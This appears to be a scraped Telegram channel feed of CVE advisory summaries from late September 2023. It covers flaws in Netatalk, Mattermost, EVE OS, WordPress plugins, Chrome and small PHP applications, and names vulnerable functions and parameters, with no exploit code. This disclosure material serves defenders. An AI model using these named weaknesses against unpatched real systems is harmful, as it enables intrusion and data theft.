🚨 CVE-2023-4506The Active Directory Integration / LDAP Integration plugin for WordPress is vulnerable to LDAP Passback in versions up to, and including, 4.1.10. This is due to insufficient validation when changing the LDAP server. This makes it possible for authenticated attackers, with administrative access and above, to change the LDAP server and retrieve the credentials for the original LDAP server.🎖@cveNotify |
|
| 2023-09-29 13:22:24 |
🚨 CVE-2019-6976libvips before 8.7.4 generates output images from uninitialized memory locations when processing corrupted input image data because iofuncs/memory.c does not zero out allocated memory. This can result in leaking raw process memory contents through the output image.🎖@cveNotify |
|
| 2023-09-29 13:22:23 |
🚨 CVE-2023-5257A vulnerability was found in WhiteHSBG JNDIExploit 1.4 on Windows. It has been rated as problematic. Affected by this issue is the function handleFileRequest of the file src/main/java/com/feihong/ldap/HTTPServer.java. The manipulation leads to path traversal. The exploit has been disclosed to the public and may be used. VDB-240866 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-09-29 13:22:22 |
🚨 CVE-2022-43634This vulnerability allows remote attackers to execute arbitrary code on affected installations of Netatalk. Authentication is not required to exploit this vulnerability. The specific flaw exists within the dsi_writeinit function. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-17646.🎖@cveNotify |
|
| 2023-09-29 13:22:21 |
🚨 CVE-2022-0194This vulnerability allows remote attackers to execute arbitrary code on affected installations of Netatalk. Authentication is not required to exploit this vulnerability. The specific flaw exists within the ad_addcomment function. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-15876.🎖@cveNotify |
|
| 2023-09-29 13:22:19 |
🚨 CVE-2022-23121This vulnerability allows remote attackers to execute arbitrary code on affected installations of Netatalk. Authentication is not required to exploit this vulnerability. The specific flaw exists within the parse_entries function. The issue results from the lack of proper error handling when parsing AppleDouble entries. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-15819.🎖@cveNotify |
|
| 2023-09-29 13:22:18 |
🚨 CVE-2022-23122This vulnerability allows remote attackers to execute arbitrary code on affected installations of Netatalk. Authentication is not required to exploit this vulnerability. The specific flaw exists within the setfilparams function. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-15837.🎖@cveNotify |
|
| 2023-09-29 13:22:17 |
🚨 CVE-2022-23123This vulnerability allows remote attackers to disclose sensitive information on affected installations of Netatalk. Authentication is not required to exploit this vulnerability. The specific flaw exists within the getdirparams method. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root. Was ZDI-CAN-15830.🎖@cveNotify |
|
| 2023-09-29 13:22:16 |
🚨 CVE-2022-23124This vulnerability allows remote attackers to disclose sensitive information on affected installations of Netatalk. Authentication is not required to exploit this vulnerability. The specific flaw exists within the get_finderinfo method. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root. Was ZDI-CAN-15870.🎖@cveNotify |
|
| 2023-09-29 13:22:14 |
🚨 CVE-2022-23125This vulnerability allows remote attackers to execute arbitrary code on affected installations of Netatalk. Authentication is not required to exploit this vulnerability. The specific flaw exists within the copyapplfile function. When parsing the len element, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-15869.🎖@cveNotify |
|
| 2023-09-29 13:22:13 |
🚨 CVE-2022-45188Netatalk through 3.1.13 has an afp_getappl heap-based buffer overflow resulting in code execution via a crafted .appl file. This provides remote root access on some platforms such as FreeBSD (used for TrueNAS).🎖@cveNotify |
|
| 2023-09-29 13:22:10 |
🚨 CVE-2020-25654An ACL bypass flaw was found in pacemaker. An attacker having a local account on the cluster and in the haclient group could use IPC communication with various daemons directly to perform certain tasks that they would be prevented by ACLs from doing if they went through the configuration.🎖@cveNotify |
|
| 2023-09-29 13:22:09 |
🚨 CVE-2019-3885A use-after-free flaw was found in pacemaker up to and including version 2.0.1 which could result in certain sensitive information to be leaked via the system logs.🎖@cveNotify |
|
| 2023-09-29 13:22:07 |
🚨 CVE-2018-16878A flaw was found in pacemaker up to and including version 2.0.1. An insufficient verification inflicted preference of uncontrolled processes can lead to DoS🎖@cveNotify |
|
| 2023-09-29 13:22:06 |
🚨 CVE-2018-16877A flaw was found in the way pacemaker's client-server authentication was implemented in versions up to and including 2.0.0. A local attacker could use this flaw, and combine it with other IPC weaknesses, to achieve local privilege escalation.🎖@cveNotify |
|
| 2023-09-29 13:22:04 |
🚨 CVE-2018-1160Netatalk before 3.1.12 is vulnerable to an out of bounds write in dsi_opensess.c. This is due to lack of bounds checking on attacker controlled data. A remote unauthenticated attacker can leverage this vulnerability to achieve arbitrary code execution.🎖@cveNotify |
|
| 2023-09-29 13:22:03 |
🚨 CVE-2023-5159Mattermost fails to properly verify the permissions when managing/updating a bot allowing a User Manager role with user edit permissions to manage/update bots.🎖@cveNotify |
|
| 2023-09-29 13:22:02 |
🚨 CVE-2023-5193Mattermost fails to properly check permissions when retrieving a post allowing for a System Role with the permission to manage channels to read the posts of a DM conversation.🎖@cveNotify |
|
| 2023-09-29 13:22:00 |
🚨 CVE-2023-5195Mattermost fails to properly validate the permissions when soft deleting a team allowing a team member to soft delete other teams that they are not part of🎖@cveNotify |
|
| 2023-09-29 13:21:59 |
🚨 CVE-2023-5196Mattermost fails to enforce character limits in all possible notification props allowing an attacker to send a really long value for a notification_prop resulting in the server consuming an abnormal quantity of computing resources and possibly becoming temporarily unavailable for its users.🎖@cveNotify |
|
| 2023-09-29 06:30:56 |
Do you enjoy reading this channel?Perhaps you have thought about placing ads on it?To do this, follow three simple steps:1) Sign up: https://telega.io/c/cveNotify2) Top up the balance in a convenient way3) Create an advertising postIf the topic of your post fits our channel, we will publish it with pleasure. |
|
| 2023-09-29 05:37:39 |
🚨 CVE-2023-43861D-Link DIR-619L B1 2.02 is vulnerable to Buffer Overflow via formSetWanPPPoE function.🎖@cveNotify |
|
| 2023-09-29 05:37:38 |
🚨 CVE-2023-43863D-Link DIR-619L B1 2.02 is vulnerable to Buffer Overflow via formSetWanDhcpplus function.🎖@cveNotify |
|
| 2023-09-29 05:37:36 |
🚨 CVE-2023-40441A resource exhaustion issue was addressed with improved input validation. This issue is fixed in iOS 17 and iPadOS 17, macOS Sonoma 14. Processing web content may lead to a denial-of-service.🎖@cveNotify |
|
| 2023-09-29 05:37:35 |
🚨 CVE-2023-40455A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sonoma 14. A sandboxed process may be able to circumvent sandbox restrictions.🎖@cveNotify |
|
| 2023-09-29 05:37:34 |
🚨 CVE-2023-40409The issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.6, tvOS 17, macOS Monterey 12.7, watchOS 10, iOS 17 and iPadOS 17. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-09-29 05:37:33 |
🚨 CVE-2023-40434A configuration issue was addressed with additional restrictions. This issue is fixed in iOS 17 and iPadOS 17, macOS Sonoma 14. An app may be able to access a user's Photos Library.🎖@cveNotify |
|
| 2023-09-29 05:37:32 |
🚨 CVE-2022-4137A reflected cross-site scripting (XSS) vulnerability was found in the 'oob' OAuth endpoint due to incorrect null-byte handling. This issue allows a malicious link to insert an arbitrary URI into a Keycloak error page. This flaw requires a user or administrator to interact with a link in order to be vulnerable. This may compromise user details, allowing it to be changed or collected by an attacker.🎖@cveNotify |
|
| 2023-09-29 05:37:31 |
🚨 CVE-2015-8371Composer before 2016-02-10 allows cache poisoning from other projects built on the same host. This results in attacker-controlled code entering a server-side build process. The issue occurs because of the way that dist packages are cached. The cache key is derived from the package name, the dist type, and certain other data from the package repository (which may simply be a commit hash, and thus can be found by an attacker). Versions through 1.0.0-alpha11 are affected, and 1.0.0 is unaffected.🎖@cveNotify |
|
| 2023-09-29 05:37:30 |
🚨 CVE-2023-3775A Vault Enterprise Sentinel Role Governing Policy created by an operator to restrict access to resources in one namespace can be applied to requests outside in another non-descendant namespace, potentially resulting in denial of service. Fixed in Vault Enterprise 1.15.0, 1.14.4, 1.13.8.🎖@cveNotify |
|
| 2023-09-29 05:37:28 |
🚨 CVE-2023-5077The Vault and Vault Enterprise ("Vault") Google Cloud secrets engine did not preserve existing Google Cloud IAM Conditions upon creating or updating rolesets. Fixed in Vault 1.13.0.🎖@cveNotify |
|
| 2023-09-29 05:37:27 |
🚨 CVE-2023-43014Asset Management System v1.0 is vulnerable toan Authenticated SQL Injection vulnerabilityon the 'first_name' and 'last_name' parametersof user.php page, allowing an authenticatedattacker to dump all the contents of the databasecontents.🎖@cveNotify |
|
| 2023-09-29 05:37:26 |
🚨 CVE-2023-43662ShokoServer is a media server which specializes in organizing anime. In affected versions the `/api/Image/WithPath` endpoint is accessible without authentication and is supposed to return default server images. The endpoint accepts the parameter `serverImagePath`, which is not sanitized in any way before being passed to `System.IO.File.OpenRead`, which results in an arbitrary file read. This issue may lead to an arbitrary file read which is exacerbated in the windows installer which installs the ShokoServer as administrator. Any unauthenticated attacker may be able to access sensitive information and read files stored on the server. The `/api/Image/WithPath` endpoint has been removed in commit `6c57ba0f0` which will be included in subsequent releases. Users should limit access to the `/api/Image/WithPath` endpoint or manually patch their installations until a patched release is made. This issue was discovered by the GitHub Security lab and is also indexed as GHSL-2023-191.🎖@cveNotify |
|
| 2023-09-29 05:37:25 |
🚨 CVE-2023-43739The 'bookisbn' parameter of the cart.php resourcedoes not validate the characters received and theyare sent unfiltered to the database.🎖@cveNotify |
|
| 2023-09-29 05:37:24 |
🚨 CVE-2023-44163The 'search' parameter of the process_search.php resourcedoes not validate the characters received and theyare sent unfiltered to the database.🎖@cveNotify |
|
| 2023-09-29 05:37:23 |
🚨 CVE-2023-44164The 'Email' parameter of the process_login.php resourcedoes not validate the characters received and theyare sent unfiltered to the database.🎖@cveNotify |
|
| 2023-09-29 05:37:19 |
🚨 CVE-2023-44165The 'Password' parameter of the process_login.php resourcedoes not validate the characters received and theyare sent unfiltered to the database.🎖@cveNotify |
|
| 2023-09-29 05:37:18 |
🚨 CVE-2023-44166The 'age' parameter of the process_registration.php resourcedoes not validate the characters received and theyare sent unfiltered to the database.🎖@cveNotify |
|
| 2023-09-29 05:37:17 |
🚨 CVE-2023-44167The 'name' parameter of the process_registration.php resourcedoes not validate the characters received and theyare sent unfiltered to the database.🎖@cveNotify |
|
| 2023-09-29 05:37:16 |
🚨 CVE-2023-44168The 'phone' parameter of the process_registration.php resourcedoes not validate the characters received and theyare sent unfiltered to the database.🎖@cveNotify |
|
| 2023-09-28 22:37:18 |
🚨 CVE-2023-43226An arbitrary file upload vulnerability in dede/baidunews.php in DedeCMS 5.7.111 and earlier allows attackers to execute arbitrary code via uploading a crafted PHP file.🎖@cveNotify |
|
| 2023-09-28 22:37:17 |
🚨 CVE-2023-43323mooSocial 3.1.8 is vulnerable to external service interaction on post function. When executed, the server sends a HTTP and DNS request to external server. The Parameters effected are multiple - messageText, data[wall_photo], data[userShareVideo] and data[userShareLink].🎖@cveNotify |
|
| 2023-09-28 20:37:53 |
🚨 CVE-2023-3141A use-after-free flaw was found in r592_remove in drivers/memstick/host/r592.c in media access in the Linux Kernel. This flaw allows a local attacker to crash the system at device disconnect, possibly leading to a kernel information leak.🎖@cveNotify |
|
| 2023-09-28 20:37:52 |
🚨 CVE-2023-43617An issue was discovered in Croc through 9.6.5. When a custom shared secret is used, the sender and receiver may divulge parts of this secret to an untrusted Relay, as part of composing a room name.🎖@cveNotify |
|
| 2023-09-28 20:37:51 |
🚨 CVE-2023-43376A cross-site scripting (XSS) vulnerability in /hoteldruid/clienti.php of Hoteldruid v3.0.5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the nometipotariffa1 parameter.🎖@cveNotify |
|
| 2023-09-28 20:37:47 |
🚨 CVE-2023-40755There is a Cross Site Scripting (XSS) vulnerability in the "theme" parameter of preview.php in PHPJabbers Callback Widget v1.0.🎖@cveNotify |
|
| 2023-09-28 20:37:46 |
🚨 CVE-2020-28419During installation with certain driver software or application packages an arbitrary code execution could occur.🎖@cveNotify |
|
| 2023-09-28 20:37:45 |
🚨 CVE-2023-40375Integrated application server for IBM i 7.2, 7.3, 7.4, and 7.5 contains a local privilege escalation vulnerability. A malicious actor with command line access to the host operating system can elevate privileges to gain root access to the host operating system. IBM X-Force ID: 263580.🎖@cveNotify |
|
| 2023-09-28 20:37:44 |
🚨 CVE-2023-43044IBM License Metric Tool 9.2 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 266893.🎖@cveNotify |
|
| 2023-09-28 20:37:41 |
🚨 CVE-2023-30415Sourcecodester Packers and Movers Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /inquiries/view_inquiry.php.🎖@cveNotify |
|
| 2023-09-28 20:37:40 |
🚨 CVE-2023-5186Use after free in Passwords in Google Chrome prior to 117.0.5938.132 allowed a remote attacker who convinced a user to engage in specific UI interaction to potentially exploit heap corruption via crafted UI interaction. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-09-28 20:37:39 |
🚨 CVE-2023-5217Heap buffer overflow in vp8 encoding in libvpx in Google Chrome prior to 117.0.5938.132 and libvpx 1.13.1 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-09-28 20:37:38 |
🚨 CVE-2023-43876A Cross-Site Scripting (XSS) vulnerability in installation of October v.3.4.16 allows an attacker to execute arbitrary web scripts via a crafted payload injected into the dbhost field.🎖@cveNotify |
|
| 2023-09-28 20:37:34 |
🚨 CVE-2023-43879Rite CMS 3.0 has a Cross-Site scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload into the Global Content Blocks in the Administration Menu.🎖@cveNotify |
|
| 2023-09-28 20:37:33 |
🚨 CVE-2021-40171The absence of notifications regarding an ongoing RF jamming attack in the SecuritasHome home alarm system, version HPGW-G 0.0.2.23F BG_U-ITR-F1-BD_BL.A30.20181117, allows an attacker to block legitimate traffic while not alerting the owner of the system.🎖@cveNotify |
|
| 2023-09-28 20:37:32 |
🚨 CVE-2023-4863Heap buffer overflow in libwebp in Google Chrome prior to 116.0.5845.187 and libwebp 1.3.2 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: Critical)🎖@cveNotify |
|
| 2023-09-28 15:39:40 |
CVE Notify pinned «» |
|
| 2023-09-28 15:39:36 |
None |
|
| 2023-09-28 15:07:35 |
🚨 CVE-2023-5232The Font Awesome More Icons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'icon' shortcode in versions up to, and including, 3.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-09-28 15:07:34 |
🚨 CVE-2023-5233The Font Awesome Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'fawesome' shortcode in versions up to, and including, 5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-09-28 15:07:33 |
🚨 CVE-2023-41444An issue in Binalyze IREC.sys v.3.11.0 and before allows a local attacker to execute arbitrary code and escalate privileges via the fun_1400084d0 function in IREC.sys driver.🎖@cveNotify |
|
| 2023-09-28 15:07:32 |
🚨 CVE-2023-41446Cross Site Scripting vulnerability in phpkobo AjaxNewTicker v.1.0.5 allows a remote attacker to execute arbitrary code via a crafted script to the title parameter in the index.php component.🎖@cveNotify |
|
| 2023-09-28 15:07:28 |
🚨 CVE-2023-41450An issue in phpkobo AjaxNewsTicker v.1.0.5 allows a remote attacker to execute arbitrary code via a crafted payload to the reque parameter.🎖@cveNotify |
|
| 2023-09-28 15:07:27 |
🚨 CVE-2023-42222WebCatalog before 49.0 is vulnerable to Incorrect Access Control. WebCatalog calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource, in some circumstances.🎖@cveNotify |
|
| 2023-09-28 15:07:26 |
🚨 CVE-2023-38871The commit 3730880 (April 2023) and v.0.9-beta1 of gugoan Economizzer has a user enumeration vulnerability in the login and forgot password functionalities. The app reacts differently when a user or email address is valid, and when it's not. This may allow an attacker to determine whether a user or email address is valid, or brute force valid usernames and email addresses.🎖@cveNotify |
|
| 2023-09-28 15:07:22 |
🚨 CVE-2023-38872An Insecure Direct Object Reference (IDOR) vulnerability in gugoan Economizzer commit 3730880 (April 2023) and v.0.9-beta1 allows any unauthenticated attacker to access cash book entry attachments of any other user, if they know the Id of the attachment.🎖@cveNotify |
|
| 2023-09-28 15:07:21 |
🚨 CVE-2023-38874A remote code execution (RCE) vulnerability via an insecure file upload exists in gugoan's Economizzer v.0.9-beta1 and commit 3730880 (April 2023). A malicious attacker can upload a PHP web shell as an attachment when adding a new cash book entry. Afterwards, the attacker may visit the web shell and execute arbitrary commands.🎖@cveNotify |
|
| 2023-09-28 15:07:20 |
🚨 CVE-2023-44273Consensys gnark-crypto through 0.11.2 allows Signature Malleability. This occurs because deserialisation of EdDSA and ECDSA signatures does not ensure that the data is in a certain interval.🎖@cveNotify |
|
| 2023-09-28 15:07:16 |
🚨 CVE-2023-41445Cross Site Scripting vulnerability in phpkobo AjaxNewTicker v.1.0.5 allows a remote attacker to execute arbitrary code via a crafted payload to the index.php component.🎖@cveNotify |
|
| 2023-09-28 15:07:15 |
🚨 CVE-2023-41449An issue in phpkobo AjaxNewsTicker v.1.0.5 allows a remote attacker to execute arbitrary code via a crafted payload to the reque parameter.🎖@cveNotify |
|
| 2023-09-28 15:07:14 |
🚨 CVE-2023-41452Cross Site Request Forgery vulnerability in phpkobo AjaxNewTicker v.1.0.5 allows a remote attacker to execute arbitrary code via a crafted payload to the txt parameter in the index.php component.🎖@cveNotify |
|
| 2023-09-28 10:37:41 |
🚨 CVE-2023-44154Sensitive information disclosure and manipulation due to improper authorization. The following products are affected: Acronis Cyber Protect 15 (Linux, Windows) before build 35979.🎖@cveNotify |
|
| 2023-09-28 10:37:40 |
🚨 CVE-2023-33934Improper Input Validation vulnerability in Apache Software Foundation Apache Traffic Server.This issue affects Apache Traffic Server: through 9.2.1.🎖@cveNotify |
|
| 2023-09-28 10:37:38 |
🚨 CVE-2022-29599In Apache Maven maven-shared-utils prior to version 3.3.3, the Commandline class can emit double-quoted strings without proper escaping, allowing shell injection attacks.🎖@cveNotify |
|
| 2023-09-28 10:37:37 |
🚨 CVE-2023-43631On boot, the Pillar eve container checks for the existence and content of“/config/authorized_keys”.If the file is present, and contains a supported public key, the container will go on to openport 22 and enable sshd with the given keys as the authorized keys for root login.An attacker could easily add their own keys and gain full control over the system withouttriggering the “measured boot” mechanism implemented by EVE OS, and without markingthe device as “UUD” (“Unknown Update Detected”).This is because the “/config” partition is not protected by “measured boot”, it is mutable, andit is not encrypted in any way.An attacker can gain full control over the device without changing the PCR values, thus nottriggering the “measured boot” mechanism, and having full access to the vault.Note:This issue was partially fixed in these commits (after disclosure to Zededa), where the configpartition measurement was added to PCR13:• aa3501d6c57206ced222c33aea15a9169d629141• 5fef4d92e75838cc78010edaed5247dfbdae1889.This issue was made viable in version 9.0.0 when the calculation was moved to PCR14 but it was not included in the measured boot.🎖@cveNotify |
|
| 2023-09-28 10:37:35 |
🚨 CVE-2023-43632As noted in the “VTPM.md” file in the eve documentation, “VTPM is a server listening on port8877 in EVE, exposing limited functionality of the TPM to the clients. VTPM allows clients toexecute tpm2-tools binaries from a list of hardcoded options”The communication with this server is done using protobuf, and the data is comprised of 2parts:1. Header2. DataWhen a connection is made, the server is waiting for 4 bytes of data, which will be the header,and these 4 bytes would be parsed as uint32 size of the actual data to come.Then, in the function “handleRequest” this size is then used in order to allocate a payload onthe stack for the incoming data.As this payload is allocated on the stack, this will allow overflowing the stack size allocated forthe relevant process with freely controlled data.* An attacker can crash the system. * An attacker can gain control over the system, specifically on the “vtpm_server” processwhich has very high privileges.🎖@cveNotify |
|
| 2023-09-28 10:37:34 |
🚨 CVE-2023-43633On boot, the Pillar eve container checks for the existence and content of“/config/GlobalConfig/global.json”.If the file exists, it overrides the existing configuration on the device on boot.This allows an attacker to change the system’s configuration, which also includes somedebug functions.This could be used to unlock the ssh with custom “authorized_keys” via the“debug.enable.ssh” key, similar to the “authorized_keys” finding that was noted before.Other usages include unlocking the usb to enable the keyboard via the “debug.enable.usb”key, allowing VNC access via the “app.allow.vnc” key, and more.An attacker could easily enable these debug functionalities without triggering the “measuredboot” mechanism implemented by EVE OS, and without marking the device as “UUD”(“Unknown Update Detected”).This is because the “/config” partition is not protected by “measured boot”, it is mutable and itis not encrypted in any way.An attacker can gain full control over the device without changing the PCR values, thereby nottriggering the “measured boot” mechanism, and having full access to the vault.Note:This issue was partially fixed in these commits (after disclosure to Zededa), where the configpartition measurement was added to PCR13:• aa3501d6c57206ced222c33aea15a9169d629141• 5fef4d92e75838cc78010edaed5247dfbdae1889.This issue was made viable in version 9.0.0 when the calculation was moved to PCR14 but it was not included in the measured boot.🎖@cveNotify |
|
| 2023-09-28 10:37:32 |
🚨 CVE-2023-43634When sealing/unsealing the “vault” key, a list of PCRs is used, which defines which PCRsare used.In a previous project, CYMOTIVE found that the configuration is not protected by the secureboot, and in response Zededa implemented measurements on the config partition that wasmapped to PCR 13.In that process, PCR 13 was added to the list of PCRs that seal/unseal the key.In commit “56e589749c6ff58ded862d39535d43253b249acf”, the config partitionmeasurement moved from PCR 13 to PCR 14, but PCR 14 was not added to the list ofPCRs that seal/unseal the key.This change makes the measurement of PCR 14 effectively redundant as it would not affectthe sealing/unsealing of the key.An attacker could modify the config partition without triggering the measured boot, this couldresult in the attacker gaining full control over the device with full access to the contents of theencrypted “vault”🎖@cveNotify |
|
| 2023-09-28 10:37:31 |
🚨 CVE-2023-43637Due to the implementation of "deriveVaultKey", prior to version 7.10, the generated vault keywould always have the last 16 bytes predetermined to be "arfoobarfoobarfo".This issue happens because "deriveVaultKey" calls "retrieveCloudKey" (which will alwaysreturn "foobarfoobarfoobarfoobarfoobarfo" as the key), and then merges the 32byterandomly generated key with this key (by takeing 16bytes from each, see "mergeKeys").This makes the key a lot weaker.This issue does not persist in devices that were initialized on/after version 7.10, but devicesthat were initialized before that and updated to a newer version still have this issue.Roll an update that enforces the full 32bytes key usage.🎖@cveNotify |
|
| 2023-09-28 10:37:30 |
🚨 CVE-2023-43630PCR14 is not in the list of PCRs that seal/unseal the “vault” key, butdue to the change that was implemented in commit“7638364bc0acf8b5c481b5ce5fea11ad44ad7fd4”, fixing this issue alone would not solve theproblem of the config partition not being measured correctly.Also, the “vault” key is sealed/unsealed with SHA1 PCRs instead ofSHA256. This issue was somewhat mitigated due to all of the PCR extend functionsupdating both the values of SHA256 and SHA1 for a given PCR ID.However, due to the change that was implemented in commit“7638364bc0acf8b5c481b5ce5fea11ad44ad7fd4”, this is no longer the case for PCR14, asthe code in “measurefs.go” explicitly updates only the SHA256 instance of PCR14, whichmeans that even if PCR14 were to be added to the list of PCRs sealing/unsealing the “vault”key, changes to the config partition would still not be measured.An attacker could modify the config partition without triggering the measured boot, this couldresult in the attacker gaining full control over the device with full access to the contents of theencrypted “vault” 🎖@cveNotify |
|
| 2023-09-28 10:37:28 |
🚨 CVE-2023-43635Vault Key Sealed With SHA1 PCRsThe measured boot solution implemented in EVE OS leans on a PCR locking mechanism.Different parts of the system update different PCR values in the TPM, resulting in a uniquevalue for each PCR entry.These PCRs are then used in order to seal/unseal a key from the TPM which is used toencrypt/decrypt the “vault” directory.This “vault” directory is the most sensitive point in the system and as such, its content shouldbe protected.This mechanism is noted in Zededa’s documentation as the “measured boot” mechanism,designed to protect said “vault”.The code that’s responsible for generating and fetching the key from the TPM assumes thatSHA256 PCRs are used in order to seal/unseal the key, and as such their presence is beingchecked.The issue here is that the key is not sealed using SHA256 PCRs, but using SHA1 PCRs.This leads to several issues:• Machines that have their SHA256 PCRs enabled but SHA1 PCRs disabled, as wellas not sealing their keys at all, meaning the “vault” is not protected from an attacker.• SHA1 is considered insecure and reduces the complexity level required to unseal thekey in machines which have their SHA1 PCRs enabled.An attacker can very easily retrieve the contents of the “vault”, which will effectively renderthe “measured boot” mechanism meaningless.🎖@cveNotify |
|
| 2023-09-28 10:37:27 |
🚨 CVE-2023-43636In EVE OS, the “measured boot” mechanism prevents a compromised device from accessingthe encrypted data located in the vault.As per the “measured boot” design, the PCR values calculated at different stages of the bootprocess will change if any of their respective parts are changed.This includes, among other things, the configuration of the bios, grub, the kernel cmdline,initrd, and more.However, this mechanism does not validate the entire rootfs, so an attacker can edit thefilesystem and gain control over the system.As the default filesystem used by EVE OS is squashfs, this is somewhat harder than an ext4,which is easily changeable.This will not stop an attacker, as an attacker can repackage the squashfs with their changesin it and replace the partition altogether.This can also be done directly on the device, as the “003-storage-init” container contains the“mksquashfs” and “unsquashfs” binaries (with the corresponding libs).An attacker can gain full control over the device without changing the PCR values, thus nottriggering the “measured boot” mechanism, and having full access to the vault.Note:This issue was partially fixed in these commits (after disclosure to Zededa), where the configpartition measurement was added to PCR13:• aa3501d6c57206ced222c33aea15a9169d629141• 5fef4d92e75838cc78010edaed5247dfbdae1889.This issue was made viable in version 9.0.0 when the calculation was moved to PCR14 but it was not included in the measured boot.🎖@cveNotify |
|
| 2023-09-28 10:37:26 |
🚨 CVE-2023-3028Insufficient authentication in the MQTT backend (broker) allows an attacker to access and even manipulate the telemetry data of the entire fleet of vehicles using the HopeChart HQT-401 telematics unit. Other models are possibly affected too.Multiple vulnerabilities were identified:- The MQTT backend does not require authentication, allowing unauthorized connections from an attacker.- The vehicles publish their telemetry data (e.g. GPS Location, speed, odometer, fuel, etc) as messages in public topics. The backend also sends commands to the vehicles as MQTT posts in public topics. As a result, an attacker can access the confidential data of the entire fleet that is managed by the backend.- The MQTT messages sent by the vehicles or the backend are not encrypted or authenticated. An attacker can create and post messages to impersonate a vehicle or the backend. The attacker could then, for example, send incorrect information to the backend about the vehicle's location.- The backend can inject data into a vehicle´s CAN bus by sending a specific MQTT message on a public topic. Because these messages are not authenticated or encrypted, an attacker could impersonate the backend, create a fake message and inject CAN data in any vehicle managed by the backend.The confirmed version is 201808021036, however further versions have been also identified as potentially impacted.🎖@cveNotify |
|
| 2023-09-28 10:37:24 |
🚨 CVE-2023-26145This affects versions of the package pydash before 6.0.0. A number of pydash methods such as pydash.objects.invoke() and pydash.collections.invoke_map() accept dotted paths (Deep Path Strings) to target a nested Python object, relative to the original source object. These paths can be used to target internal class attributes and dict items, to retrieve, modify or invoke nested Python objects.**Note:**The pydash.objects.invoke() method is vulnerable to Command Injection when the following prerequisites are satisfied:1) The source object (argument 1) is not a built-in object such as list/dict (otherwise, the __init__.__globals__ path is not accessible)2) The attacker has control over argument 2 (the path string) and argument 3 (the argument to pass to the invoked method)The pydash.collections.invoke_map() method is also vulnerable, but is harder to exploit as the attacker does not have direct control over the argument to be passed to the invoked function.🎖@cveNotify |
|
| 2023-09-28 10:37:23 |
🚨 CVE-2023-26149Versions of the package quill-mention before 4.0.0 are vulnerable to Cross-site Scripting (XSS) due to improper user-input sanitization, via the renderList function. **Note:**If the mentions list is sourced from unsafe (user-sourced) data, this might allow an injection attack when a Quill user hits @.🎖@cveNotify |
|
| 2023-09-28 10:37:22 |
🚨 CVE-2023-44275OPNsense before 23.7.5 allows XSS via the index.php column_count parameter to the Lobby Dashboard.🎖@cveNotify |
|
| 2023-09-28 10:37:21 |
🚨 CVE-2023-44276OPNsense before 23.7.5 allows XSS via the index.php sequence parameter to the Lobby Dashboard.🎖@cveNotify |
|
| 2023-09-28 10:37:19 |
🚨 CVE-2023-5230The TM WooCommerce Compare & Wishlist plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'tm_woo_wishlist_table' shortcode in versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-09-28 10:37:18 |
🚨 CVE-2023-5232The Font Awesome More Icons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'icon' shortcode in versions up to, and including, 3.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-09-28 10:37:17 |
🚨 CVE-2023-5233The Font Awesome Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'fawesome' shortcode in versions up to, and including, 5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-09-28 10:37:16 |
🚨 CVE-2023-39007/ui/cron/item/open in the Cron component of OPNsense before 23.7 allows XSS via openAction in app/controllers/OPNsense/Cron/ItemController.php.🎖@cveNotify |
|
| 2023-09-27 21:07:33 |
🚨 CVE-2023-44022Tenda AC10U v1.0 US_AC10UV1.0RTL_V15.03.06.49_multi_TDE01 was discovered to contain a stack overflow via the speed_dir parameter in the formSetSpeedWan function.🎖@cveNotify |
|
| 2023-09-27 21:07:32 |
